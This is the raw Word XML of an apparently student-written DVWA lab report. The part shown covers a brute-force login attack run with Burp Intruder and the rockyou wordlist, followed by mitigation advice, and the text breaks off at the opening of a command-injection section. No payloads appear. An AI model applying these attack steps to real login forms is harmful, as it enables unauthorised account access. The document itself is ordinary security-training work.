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249623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6E0EE" w14:textId="509B39C0" w:rsidR="00CB0383" w:rsidRDefault="00CB0383" w:rsidP="004C60AE">
          <w:pPr>
            <w:pStyle w:val="Title"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="305FC694" w14:textId="3D888AEE" w:rsidR="00E1093B" w:rsidRDefault="00CB038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45887" w:history="1">
            <w:r w:rsidR="00E1093B" w:rsidRPr="00DD5D39">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00E1093B"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="00E1093B" w:rsidRPr="00DD5D39">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bruteforce-Attack</w:t>
            </w:r>
            <w:r w:rsidR="00E1093B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E1093B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E1093B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc198745887 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E1093B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E1093B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E1093B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00E1093B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6551D755" w14:textId="50D84D4F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88" w:history="1">
            <w:r w:rsidRPr="00DD5D3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C13B" w14:textId="0980A81C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89" w:history="1">
            <w:r w:rsidRPr="00DD5D3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B6BF" w14:textId="4AD8588C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90" w:history="1">
            <w:r w:rsidRPr="00DD5D3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8DB5" w14:textId="5C9AFF03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91" w:history="1">
            <w:r w:rsidRPr="00DD5D3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4E2A" w14:textId="798664AC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92" w:history="1">
            <w:r w:rsidRPr="00DD5D39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934C" w14:textId="201E9B7C" w:rsidR="00E1093B" w:rsidRDefault="00E109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93" w:history="1">
            <w:r w:rsidRPr="00DD5D3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Command Injection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B5FC" w14:textId="3E1DFEA8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94" w:history="1">
            <w:r w:rsidRPr="00DD5D3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4330" w14:textId="537197BC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95" w:history="1">
            <w:r w:rsidRPr="00DD5D3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5C96" w14:textId="54D18322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96" w:history="1">
            <w:r w:rsidRPr="00DD5D3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994A" w14:textId="0CA5E236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97" w:history="1">
            <w:r w:rsidRPr="00DD5D3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B1EE" w14:textId="05CF3BF9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98" w:history="1">
            <w:r w:rsidRPr="00DD5D3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E695" w14:textId="64D994D0" w:rsidR="00E1093B" w:rsidRDefault="00E109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899" w:history="1">
            <w:r w:rsidRPr="00DD5D3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CSRF_XSRF_SessionRiding_OneClick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A3FD" w14:textId="749CA26F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00" w:history="1">
            <w:r w:rsidRPr="00DD5D3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1426" w14:textId="4982A443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01" w:history="1">
            <w:r w:rsidRPr="00DD5D3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DDBC" w14:textId="7C8FD5AD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02" w:history="1">
            <w:r w:rsidRPr="00DD5D3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2661" w14:textId="72302277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03" w:history="1">
            <w:r w:rsidRPr="00DD5D3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09BE" w14:textId="547CCECC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04" w:history="1">
            <w:r w:rsidRPr="00DD5D39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81D6" w14:textId="71E8632C" w:rsidR="00E1093B" w:rsidRDefault="00E109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05" w:history="1">
            <w:r w:rsidRPr="00DD5D3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File Inclusion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B0FB" w14:textId="010A0217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06" w:history="1">
            <w:r w:rsidRPr="00DD5D3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5689" w14:textId="25BFB4C8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07" w:history="1">
            <w:r w:rsidRPr="00DD5D3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BF4D" w14:textId="2D96AB20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08" w:history="1">
            <w:r w:rsidRPr="00DD5D3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DEA3" w14:textId="540DBBFC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09" w:history="1">
            <w:r w:rsidRPr="00DD5D3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021C" w14:textId="44467600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10" w:history="1">
            <w:r w:rsidRPr="00DD5D3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BF6B" w14:textId="5FADB498" w:rsidR="00E1093B" w:rsidRDefault="00E109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11" w:history="1">
            <w:r w:rsidRPr="00DD5D3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File Upload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3E25" w14:textId="42B1946F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12" w:history="1">
            <w:r w:rsidRPr="00DD5D3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D5D9" w14:textId="6119F105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13" w:history="1">
            <w:r w:rsidRPr="00DD5D3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DFD2" w14:textId="29649F9A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14" w:history="1">
            <w:r w:rsidRPr="00DD5D3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23AD" w14:textId="370286B4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15" w:history="1">
            <w:r w:rsidRPr="00DD5D3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7A05" w14:textId="47572138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16" w:history="1">
            <w:r w:rsidRPr="00DD5D39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D7F4" w14:textId="0880B8F9" w:rsidR="00E1093B" w:rsidRDefault="00E109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17" w:history="1">
            <w:r w:rsidRPr="00DD5D3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secure CAPTCHA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5FB7" w14:textId="2B8D7EDA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18" w:history="1">
            <w:r w:rsidRPr="00DD5D3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D28A" w14:textId="16BCD887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19" w:history="1">
            <w:r w:rsidRPr="00DD5D3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B08F" w14:textId="0F782638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20" w:history="1">
            <w:r w:rsidRPr="00DD5D39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08CF" w14:textId="19CF0D56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21" w:history="1">
            <w:r w:rsidRPr="00DD5D39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C325" w14:textId="71259E1A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22" w:history="1">
            <w:r w:rsidRPr="00DD5D39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2308" w14:textId="543A33DC" w:rsidR="00E1093B" w:rsidRDefault="00E109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23" w:history="1">
            <w:r w:rsidRPr="00DD5D3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SQL Injection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B36A" w14:textId="5BF442DD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24" w:history="1">
            <w:r w:rsidRPr="00DD5D39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A441" w14:textId="6F634A3B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25" w:history="1">
            <w:r w:rsidRPr="00DD5D39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14AD" w14:textId="51FA32A1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26" w:history="1">
            <w:r w:rsidRPr="00DD5D39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FA20" w14:textId="1DC3A00F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27" w:history="1">
            <w:r w:rsidRPr="00DD5D39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9030" w14:textId="529B6318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28" w:history="1">
            <w:r w:rsidRPr="00DD5D39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773A" w14:textId="6843412A" w:rsidR="00E1093B" w:rsidRDefault="00E109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29" w:history="1">
            <w:r w:rsidRPr="00DD5D3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SQL Blind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B43A" w14:textId="5E8D5289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30" w:history="1">
            <w:r w:rsidRPr="00DD5D39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EBD7" w14:textId="5674708D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31" w:history="1">
            <w:r w:rsidRPr="00DD5D39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579F" w14:textId="3C8FD9C6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32" w:history="1">
            <w:r w:rsidRPr="00DD5D39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314D" w14:textId="317C4C11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33" w:history="1">
            <w:r w:rsidRPr="00DD5D39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15D6" w14:textId="0E6B1164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34" w:history="1">
            <w:r w:rsidRPr="00DD5D39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9BCB" w14:textId="7998946F" w:rsidR="00E1093B" w:rsidRDefault="00E109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35" w:history="1">
            <w:r w:rsidRPr="00DD5D3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Weak Session IDs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878C" w14:textId="3947EDE9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36" w:history="1">
            <w:r w:rsidRPr="00DD5D39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E6AB" w14:textId="058E4882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37" w:history="1">
            <w:r w:rsidRPr="00DD5D39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FBAD" w14:textId="7068E144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38" w:history="1">
            <w:r w:rsidRPr="00DD5D39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CF40" w14:textId="64228C4A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39" w:history="1">
            <w:r w:rsidRPr="00DD5D39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94F4" w14:textId="277E55BD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40" w:history="1">
            <w:r w:rsidRPr="00DD5D39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3227" w14:textId="6BC8BA46" w:rsidR="00E1093B" w:rsidRDefault="00E1093B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41" w:history="1">
            <w:r w:rsidRPr="00DD5D3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XSS DOM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D005" w14:textId="3AA27B80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42" w:history="1">
            <w:r w:rsidRPr="00DD5D39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1F17" w14:textId="06DD8EF8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43" w:history="1">
            <w:r w:rsidRPr="00DD5D39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95F1" w14:textId="66268466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44" w:history="1">
            <w:r w:rsidRPr="00DD5D39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F732" w14:textId="168F2920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45" w:history="1">
            <w:r w:rsidRPr="00DD5D39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1F4B" w14:textId="16CF30DF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46" w:history="1">
            <w:r w:rsidRPr="00DD5D39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49D3" w14:textId="5C9ED8DF" w:rsidR="00E1093B" w:rsidRDefault="00E1093B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47" w:history="1">
            <w:r w:rsidRPr="00DD5D39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XSS Reflected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0BBB" w14:textId="6883C735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48" w:history="1">
            <w:r w:rsidRPr="00DD5D39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C3E0" w14:textId="475B4E8A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49" w:history="1">
            <w:r w:rsidRPr="00DD5D39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3207" w14:textId="754F7163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50" w:history="1">
            <w:r w:rsidRPr="00DD5D39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2596" w14:textId="45441687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51" w:history="1">
            <w:r w:rsidRPr="00DD5D39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CCAC" w14:textId="50C37B73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52" w:history="1">
            <w:r w:rsidRPr="00DD5D39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D2E0" w14:textId="420E5D66" w:rsidR="00E1093B" w:rsidRDefault="00E1093B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53" w:history="1">
            <w:r w:rsidRPr="00DD5D39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XSS Stored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C6E6" w14:textId="615F15DB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54" w:history="1">
            <w:r w:rsidRPr="00DD5D39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3234" w14:textId="195DF9C3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55" w:history="1">
            <w:r w:rsidRPr="00DD5D39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EE1F" w14:textId="65F13355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56" w:history="1">
            <w:r w:rsidRPr="00DD5D39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1792" w14:textId="7908D1BE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57" w:history="1">
            <w:r w:rsidRPr="00DD5D39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FCB3" w14:textId="7B5CE102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58" w:history="1">
            <w:r w:rsidRPr="00DD5D39">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12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55DC" w14:textId="4CC993E3" w:rsidR="00E1093B" w:rsidRDefault="00E1093B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59" w:history="1">
            <w:r w:rsidRPr="00DD5D39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Content Security Policy Bypass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DC46" w14:textId="24547AA5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60" w:history="1">
            <w:r w:rsidRPr="00DD5D39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2CF1" w14:textId="50534C60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61" w:history="1">
            <w:r w:rsidRPr="00DD5D39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E647" w14:textId="4AC835EF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62" w:history="1">
            <w:r w:rsidRPr="00DD5D39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0BA1" w14:textId="1694FA44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63" w:history="1">
            <w:r w:rsidRPr="00DD5D39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1787" w14:textId="0F0CC601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64" w:history="1">
            <w:r w:rsidRPr="00DD5D39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4939" w14:textId="0AC64F28" w:rsidR="00E1093B" w:rsidRDefault="00E1093B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65" w:history="1">
            <w:r w:rsidRPr="00DD5D39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JavaScript-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C582" w14:textId="28888540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66" w:history="1">
            <w:r w:rsidRPr="00DD5D39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CFBE" w14:textId="380CFD63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67" w:history="1">
            <w:r w:rsidRPr="00DD5D39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5263" w14:textId="0535D6D5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68" w:history="1">
            <w:r w:rsidRPr="00DD5D39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79CD" w14:textId="4B03B9F4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69" w:history="1">
            <w:r w:rsidRPr="00DD5D39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A582" w14:textId="3F174C77" w:rsidR="00E1093B" w:rsidRDefault="00E109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8745970" w:history="1">
            <w:r w:rsidRPr="00DD5D39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D5D39">
              <w:rPr>
                <w:rStyle w:val="Hyperlink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BED6" w14:textId="373845C4" w:rsidR="00CB0383" w:rsidRDefault="00CB0383">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4E092C60" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3451C4" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="50A4B64C" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="402CCDA6" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="7C7E31E0" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="5BEC5010" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="06F227DA" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="0B02B757" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="75976515" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="471A931B" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="489EC58B" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="004C60AE"/>
    <w:p w14:paraId="0D69052E" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="004C60AE"/>
    <w:p w14:paraId="138B5862" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="6DC56A56" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRPr="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE"/>
    <w:p w14:paraId="40F5BB44" w14:textId="5639B815" w:rsidR="002521BE" w:rsidRPr="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc198745887"/>
      <w:r w:rsidRPr="004C60AE">
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2FD2A828" w14:textId="3D6A8CC4" w:rsidR="00CB0383" w:rsidRDefault="00CB0383" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc198745888"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7676A529" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C4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1C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ile exploring DVWA, I tested the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41C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rute Force vulnerability module</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41C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which simulates a login form that lacks proper protection mechanisms. My objective was to perform a brute force attack to gain access using various combinations of usernames and passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AB1486" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C4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1C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brute force attack works by trying many username-password combinations until the correct one is found. In this case, DVWA allowed unlimited login attempts, making it an ideal scenario to demonstrate a successful brute force attack using automated tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513E2E56" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C15"/>
    <w:p w14:paraId="142F950D" w14:textId="7102B5D1" w:rsidR="00CB0383" w:rsidRDefault="00CB0383" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc198745889"/>
      <w:r w:rsidRPr="00CB0383">
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2A2AE232" w14:textId="4E7ED4F4" w:rsidR="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t>Intercept the Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FAD2EC" w14:textId="186F3E6A" w:rsidR="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t>Send Req. to Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490653B9" w14:textId="07B61FAB" w:rsidR="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t>Select Password Position than insert payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DAF4FB" w14:textId="61BBF901" w:rsidR="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t>Generate payload using password wordlist(rockyou.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0D7CF9" w14:textId="329AC1CD" w:rsidR="00CC7943" w:rsidRPr="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t>Start Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADDD30" w14:textId="671DC136" w:rsidR="00CC7943" w:rsidRPr="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5427659D" wp14:editId="4515CF67">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="196484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DA32" w14:textId="47DD40A3" w:rsidR="00CB0383" w:rsidRDefault="00CB0383" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc198745890"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0676C61D" w14:textId="7981E4A4" w:rsidR="00CB0383" w:rsidRDefault="00CB0383" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc198745891"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="59FBD14B" w14:textId="0DFA4B55" w:rsidR="00CC7943" w:rsidRPr="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="652773E1" wp14:editId="6D1B22E0">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1530604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4A6C" w14:textId="4594F2C4" w:rsidR="00CB0383" w:rsidRDefault="00CB0383" w:rsidP="00CB0383">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc198745892"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="76D6B7D5" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C41C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If this were a real application, I would recommend the following mitigations based on what I exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657690E" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C1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1C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Limit login attempts per user or IP. This would have blocked me early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02660F89" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C1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1C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Account Lockout</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Temporarily lock accounts after failed logins to discourage brute forcing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206EBF42" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C1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1C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CAPTCHA Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Would have stopped my automated Burp Intruder attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ABFB34" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C1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1C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Multi-Factor Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Even if I found the correct credentials, I couldn’t log in without the second factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D0DB87" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C1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1C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Strong Password Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Weak passwords like admin:password should be rejected at creation time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72827127" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C1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1C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Logging and Alerts</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Continuous login failures should trigger alerts for system admins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A5550" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C15"/>
    <w:p w14:paraId="7E2EFAEA" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="00CB0383"/>
    <w:p w14:paraId="1EA8F1E1" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="00CB0383"/>
    <w:p w14:paraId="7B68DC02" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="00CB0383"/>
    <w:p w14:paraId="41256EA3" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="00CB0383"/>
    <w:p w14:paraId="0E6DB376" w14:textId="716745A5" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc198745893"/>
      <w:r>
        <w:t>Command Injection</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4233B08F" w14:textId="1279B63E" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc198745894"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="038A2745" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116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D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ile analyzing DVWA, I selected the </w:t>
      </w:r>
      <w:r w:rsidRPr="00116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mand Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00116D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dule to test how unsanitized user input can lead to remote command execution on the underlying operating system. This vulnerability arises when an application incorporates unvalidated user input directly into a system command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661121AF" w14:textId="77777777" w:rsidR="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116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D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DVWA, the target field is a simple IP lookup form using the ping command. If proper validation is not implemented, attackers like me can inject additional system commands via the input field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D4084" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116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D51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🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00116D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w It Happens: Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75103658" w14:textId="77777777" w:rsidR="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116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D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command injection vulnerability usually happens when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D86AAD" w14:textId="451FEE92" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116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D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backend uses system(), exec(), shell_exec(), or similar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42666C7C" w14:textId="77777777" w:rsidR="00C41C15" w:rsidRPr="00C41C15" w:rsidRDefault="00C41C15" w:rsidP="00C41C15"/>
    <w:p w14:paraId="5AF9F133" w14:textId="1DF121FB" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc198745895"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
